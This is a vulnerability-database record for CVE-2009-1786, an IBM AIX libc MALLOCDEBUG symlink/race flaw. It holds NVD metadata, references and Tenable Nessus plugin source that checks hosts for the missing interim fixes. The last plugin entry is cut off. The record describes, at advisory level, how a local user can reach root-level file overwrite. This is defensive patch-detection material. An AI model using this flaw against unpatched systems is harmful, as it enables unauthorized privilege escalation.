ID CVE-2009-1786
Type cve
Reporter NVD
Modified 2017-09-28T21:34:33
Description
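The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable. The IBM advisory text quoted in the scanner entries of this record describes the same flaw as a race condition in the MALLOCDEBUG debugging component that a local user can reach when executing setuid root programs, which explains why the overwrite is not limited to the user's own files and can lead to code execution as root. The remedy given there is to install the interim fix for the affected technology level (APARs IZ50121, IZ50129, IZ50139, IZ50445, IZ50447, IZ50500, IZ50517). Several of the embedded AIX 6.1 checks pass a maxfilesetver lower than the minfilesetver (for example 6.1.2.0 with 6.1.0.3); how the check treats such a range is not visible here, so a clean scan result for those levels is worth confirming against the installed bos.rte.libc and bos.adt.prof fileset levels.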
{"id": "CVE-2009-1786", "bulletinFamily": "NVD", "title": "CVE-2009-1786", "description": "The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.", "published": "2009-05-26T11:30:05", "modified": "2017-09-28T21:34:33", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1786", "reporter": "NVD", "references": ["http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50129", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50517", "https://www.exploit-db.com/exploits/9306", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50636", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50445", "http://www.vupen.com/english/advisories/2009/1380", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50121", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50139", "http://securitytracker.com/id?1022261", "http://www.securityfocus.com/bid/35034", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50500", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50447", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=802"], "cvelist": ["CVE-2009-1786"], "type": "cve", "lastseen": "2017-09-29T14:26:37", "history": [{"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:ibm:aix:6.1", "cpe:/o:ibm:aix:5.3"], "cvelist": ["CVE-2009-1786"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite 
arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.", "edition": 1, "enchantments": {}, "hash": "ebae3fe06fbcc50bd54b877a85690241ce9f0c0ee6c7f47051cd39088c9cccbc", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "2837615eda414186429d259c63538585", "key": "cvelist"}, {"hash": "1cdedeed0813fbf2cd550457e5a39315", "key": "modified"}, {"hash": "e1ad4aec00bbd563078899d589a946bd", "key": "description"}, {"hash": "00ec1b8e9a79c0c6fb360773f2467ed4", "key": "title"}, {"hash": "5ebc2695205cd128c1b4f16c7c42442e", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "c69fd1e76d15c60586f67ca66d7fe7d4", "key": "assessment"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97c7e662cb5d434a9d1bc13081eeced7", "key": "scanner"}, {"hash": "609efa1f1196205cf6090008f54b5ccf", "key": "cpe"}, {"hash": "f0243036bf6f9d24bb38e09fc313c870", "key": "published"}, {"hash": "de1511a16054562d3e6b6349b352e617", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1786", "id": "CVE-2009-1786", "lastseen": "2016-09-03T12:26:04", "modified": "2010-08-21T01:32:39", "objectVersion": "1.2", "published": "2009-05-26T11:30:05", "references": ["http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50129", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50517", "http://xforce.iss.net/xforce/xfdb/50636", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50445", "http://www.vupen.com/english/advisories/2009/1380", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50121", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50139", "http://www.milw0rm.com/exploits/9306", "http://securitytracker.com/id?1022261", "http://www.securityfocus.com/bid/35034", 
"http://www.ibm.com/support/docview.wss?uid=isg1IZ50500", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50447", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=802"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2009-1786", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T12:26:04"}, {"bulletin": {"assessment": {"href": "http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "bulletinFamily": "NVD", "cpe": ["cpe:/o:ibm:aix:6.1", "cpe:/o:ibm:aix:5.3"], "cvelist": ["CVE-2009-1786"], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows local users to create or overwrite arbitrary files via a symlink attack on the log file associated with the MALLOCDEBUG environment variable.", "edition": 2, "enchantments": {}, "hash": "5849d1727d1b16bbf7bf37c07f3e5bd7841266078ba53316fbcaa443f834c08d", "hashmap": [{"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "cd38b3d3631380c87673a95e58a4f183", "key": "references"}, {"hash": "2837615eda414186429d259c63538585", "key": "cvelist"}, {"hash": "e1ad4aec00bbd563078899d589a946bd", "key": "description"}, {"hash": "00ec1b8e9a79c0c6fb360773f2467ed4", "key": "title"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9", "key": "cvss"}, {"hash": "c69fd1e76d15c60586f67ca66d7fe7d4", "key": "assessment"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "97c7e662cb5d434a9d1bc13081eeced7", "key": 
"scanner"}, {"hash": "609efa1f1196205cf6090008f54b5ccf", "key": "cpe"}, {"hash": "f0243036bf6f9d24bb38e09fc313c870", "key": "published"}, {"hash": "484445e54206546c38eeb1b876c04f03", "key": "modified"}, {"hash": "de1511a16054562d3e6b6349b352e617", "key": "href"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1786", "id": "CVE-2009-1786", "lastseen": "2017-08-17T11:14:21", "modified": "2017-08-16T21:30:30", "objectVersion": "1.3", "published": "2009-05-26T11:30:05", "references": ["http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50129", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50517", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50636", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50445", "http://www.vupen.com/english/advisories/2009/1380", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50121", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50139", "http://www.milw0rm.com/exploits/9306", "http://securitytracker.com/id?1022261", "http://www.securityfocus.com/bid/35034", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50500", "http://www.ibm.com/support/docview.wss?uid=isg1IZ50447", "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=802"], "reporter": "NVD", "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}], "title": "CVE-2009-1786", "type": "cve", "viewCount": 0}, "differentElements": ["references", "assessment", "modified"], "edition": 2, "lastseen": "2017-08-17T11:14:21"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6ce8fb166d9146873362979cd7146812"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "609efa1f1196205cf6090008f54b5ccf"}, {"key": "cvelist", "hash": 
"2837615eda414186429d259c63538585"}, {"key": "cvss", "hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9"}, {"key": "description", "hash": "e1ad4aec00bbd563078899d589a946bd"}, {"key": "href", "hash": "de1511a16054562d3e6b6349b352e617"}, {"key": "modified", "hash": "9461523ec39e20b63d29099578037f93"}, {"key": "published", "hash": "f0243036bf6f9d24bb38e09fc313c870"}, {"key": "references", "hash": "e296db26ec3f99fbbbf0af3cc640ed28"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "97c7e662cb5d434a9d1bc13081eeced7"}, {"key": "title", "hash": "00ec1b8e9a79c0c6fb360773f2467ed4"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "092ed376400c008e6a47f45907ceb24b9bb92345541d25da09041dbe6adf4061", "viewCount": 0, "enchantments": {"score": {"value": 2.1, "vector": "NONE", "modified": "2017-09-29T14:26:37"}, "dependencies": {"references": [{"type": "nessus", "idList": ["AIX_IZ50447.NASL", "AIX_IZ50121.NASL", "AIX_IZ50517.NASL", "AIX_IZ50445.NASL", "AIX_IZ50139.NASL", "AIX_IZ50129.NASL", "AIX_IZ50500.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:33001"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:139565"]}], "modified": "2017-09-29T14:26:37"}, "vulnersScore": 2.1}, "objectVersion": "1.3", "cpe": ["cpe:/o:ibm:aix:6.1", "cpe:/o:ibm:aix:5.3"], "assessment": {"href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}, "scanner": [{"href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6276", "name": "oval:org.mitre.oval:def:6276", "system": "http://oval.mitre.org/XMLSchema/oval-definitions-5"}]}
{"nessus": [{"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50517.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64331", "title": "AIX 5.3 TL 7 : libc (IZ50517)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64331);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 7 : libc (IZ50517)\");\n script_summary(english:\"Check for APAR IZ50517\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"07\", patch:\"IZ50517_07\", package:\"bos.rte.libc\", minfilesetver:\"5.3.7.0\", maxfilesetver:\"5.3.7.8\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"07\", patch:\"IZ50517_07\", package:\"bos.adt.prof\", minfilesetver:\"5.3.7.0\", maxfilesetver:\"5.3.7.8\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50445.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64328", "title": "AIX 5.3 TL 9 : libc (IZ50445)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64328);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 9 : libc (IZ50445)\");\n script_summary(english:\"Check for APAR IZ50445\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ50445_09\", package:\"bos.rte.libc\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.2\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"09\", patch:\"IZ50445_09\", package:\"bos.adt.prof\", minfilesetver:\"5.3.9.0\", maxfilesetver:\"5.3.9.2\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50121.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64325", "title": "AIX 6.1 TL 2 : libc (IZ50121)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64325);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 2 : libc (IZ50121)\");\n script_summary(english:\"Check for APAR IZ50121\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ50121_02\", package:\"bos.rte.libc\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"02\", patch:\"IZ50121_02\", package:\"bos.adt.prof\", minfilesetver:\"6.1.2.0\", maxfilesetver:\"6.1.0.3\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50447.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64329", "title": "AIX 5.3 TL 8 : libc (IZ50447)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64329);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 5.3 TL 8 : libc (IZ50447)\");\n script_summary(english:\"Check for APAR IZ50447\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/libc_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cwe_id(362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:5.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! 
get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"5.3\", ml:\"08\", patch:\"IZ50447_08\", package:\"bos.rte.libc\", minfilesetver:\"5.3.8.0\", maxfilesetver:\"5.3.8.5\") < 0) flag++;\nif (aix_check_ifix(release:\"5.3\", ml:\"08\", patch:\"IZ50447_08\", package:\"bos.adt.prof\", minfilesetver:\"5.3.8.0\", maxfilesetver:\"5.3.8.5\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:15:34", "bulletinFamily": "scanner", "description": "There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
A local user can exploit\nthis race condition when executing setuid root programs and thereby\noverwrite any file in the system.\n\nThe successful exploitation of this vulnerability allows a local user\nto overwrite arbitrary files and execute arbitrary code as the root\nuser.\n\nThe following libraries are vulnerable :\n\n/usr/ccs/lib/libc.a /usr/ccs/lib/libp/libc.a.", "modified": "2013-03-11T00:00:00", "published": "2013-01-30T00:00:00", "id": "AIX_IZ50139.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=64327", "title": "AIX 6.1 TL 0 : libc (IZ50139)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory libc_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64327);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2013/03/11 18:51:58 $\");\n\n script_cve_id(\"CVE-2009-1786\");\n\n script_name(english:\"AIX 6.1 TL 0 : libc (IZ50139)\");\n script_summary(english:\"Check for APAR IZ50139\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"There is a race condition in the MALLOCDEBUG debugging component of\nthe malloc subsystem in the library libc.a. 
